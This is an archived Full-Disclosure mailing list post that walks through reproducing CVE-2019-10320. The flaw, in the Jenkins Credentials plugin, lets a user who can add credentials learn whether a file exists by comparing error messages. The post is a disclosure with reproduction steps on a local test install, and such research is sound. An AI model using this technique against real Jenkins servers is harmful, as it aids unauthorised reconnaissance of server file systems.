lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [day] [month] [year] [list]
Message-ID: <CAAyEnSOJMdPPUtU=FVx4VPdpQn9JrmBbnmwRG=QmhSTtvTQ+ww@mail.gmail.com>
Date: Thu, 23 May 2019 23:34:30 -0400
From: Nightwatch Cybersecurity Research <research@...htwatchcybersecurity.com>
To: fulldisclosure@...lists.org
Subject: [FD] Exploring the File System via Jenkins Credentials Plugin Vulnerability – CVE-2019-10320

[Original blog post here:
https://wwws.nightwatchcybersecurity.com/2019/05/23/exploring-the-file-system-via-jenkins-credentials-plugin-vulnerability-cve-2019-10320/]

SUMMARY

The recently fixed vulnerability in the Jenkins Credentials plugin
(v2.1.19) allowed users with certain permissions to confirm existence
of a file on the server’s file system. While this doesn’t allow an
attacker to view the file content, the ability to obtain information
about the file system can be leveraged for other attacks. In this post
we will explain how to reproduce this vulnerability.

It is also possible to load credentials from a valid PKCS#12 files on
the Jenkins server, and obtain access to the contents of those
credentials via a job. That may be addressed in a future blog post.

PLEASE NOTE: This is only exploitable by users that have sufficient
access to the Jenkins server to add or update credentials. Usually
anonymous users do not have that level of access.

PREREQUISITES

You will need to download, install and initialize Jenkins following
these instructions ("https://jenkins.io/doc/book/installing/"). DO NOT
install any plugin during the installation process. When done, you
should be able to login to Jenkins via the following URL:
“http://localhost:8080/“.

INSTALLING THE VULNERABLE PLUGIN

1. Download the vulnerable plugin (v2.1.18) from the Jenkins update
site as an HPI file
("https://updates.jenkins.io/download/plugins/credentials/").

2. Go to the Jenkins plugin manager, and click the advanced tab
(“http://localhost:8080/pluginManager/advanced“) to get to the manual
plugin installation page. Select the HPI file downloaded in the
previous step and install it. Restart the Jenkins server
(“http://localhost:8080/restart“) after the plugin has been installed.

3. Login to the Jenkins management page
(“http://localhost:8080/manage“) and plugin manager
(“http://localhost:8080/pluginManager/“) to confirm that the
vulnerable plugin has been installed.

GETTING TO THE VULNERABLE PAGE

1. Login to Jenkins, then go to “Credentials”, “System”, “Global
Credentials”. Click the new option “Add Credentials” that appears on
the left side. The user that you are using MUST have sufficient
permissions to add or update credentials. You can also reach this page
by going directly to
“http://localhost:8080/credentials/store/system/domain/_/newCredentials“.

2. In the “Kind” drop down box select “Certificate”, and from the two
radio buttons select “From a PKCS#12 file on Jenkins master”.

EXPLOITATION

Put in a valid path in the “file” box and click anywhere in the page
to refresh. You will get an error message “The file xxxx doesn’t
exists” if the file is not present, OR “Could not load keystore” if
the file does exists. This would allow an attacker to explore the file
system and confirm whether specific files exist or not. While file
content cannot be viewed (unless they are PKCS#12 files), the attacker
can use this technique to help advance other attacks.

REFERENCES

CVE-ID: CVE-2019-10320
Vendor advisory: https://jenkins.io/security/advisory/2019-05-21/#SECURITY-1322

_______________________________________________
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ